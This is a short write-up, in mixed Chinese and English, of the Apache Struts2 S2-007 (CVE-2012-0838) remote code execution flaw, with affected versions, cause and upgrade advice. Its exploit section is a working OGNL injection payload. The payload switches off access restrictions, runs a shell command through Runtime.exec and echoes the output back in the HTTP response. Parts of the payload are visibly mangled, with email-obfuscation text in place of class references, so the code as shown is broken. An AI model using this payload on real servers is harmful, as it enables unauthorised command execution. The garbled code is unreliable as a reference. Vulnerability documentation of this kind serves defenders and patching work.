struts2 CVE-2012-0838 S2-007 Remote Code Execution


1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

1. Description


1. S2-003、S2-005: 通过OGNL的name-value的赋值解析过程、#访问全局静态变量(AOP思想)实现代码执行
2. S2-007: 通过OGNL中String向long转换过程实现代码执行

User input is evaluated as an OGNL expression when there‘s a conversion error. This allows a malicious user to execute arbitrary code.
关于struts2 OGNL的相关知识,请参阅另一篇文章
//搜索:5. struts2 OGNL表达式

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2. Effected Scope

Struts 2.0.0 - Struts 2.2.3

3. Exploit Analysis

0x1: POC

id=‘%2b(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="ifconfig",%[email protected]@getRuntime().exec(%23cmd),,%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%[email protected]@getResponse(),%23out.getWriter().println(%23echo))%2b‘

4. Principle Of Vulnerability

Apache Struts之前的2版本中存在漏洞,该漏洞源于在处理转换错误时评估字符串为OGNL表达式。远程攻击者可利用此漏洞借助无效的输入,修改run-time数据值,进而执行任意代码

5. Patch Fix

0x1: upgrade struts2

It is strongly recommended to upgrade to Struts, which contains the corrected classes.

Relevant Link:

Copyright (c) 2015 Little5ann All rights reserved

时间: 2024-08-29 04:39:31

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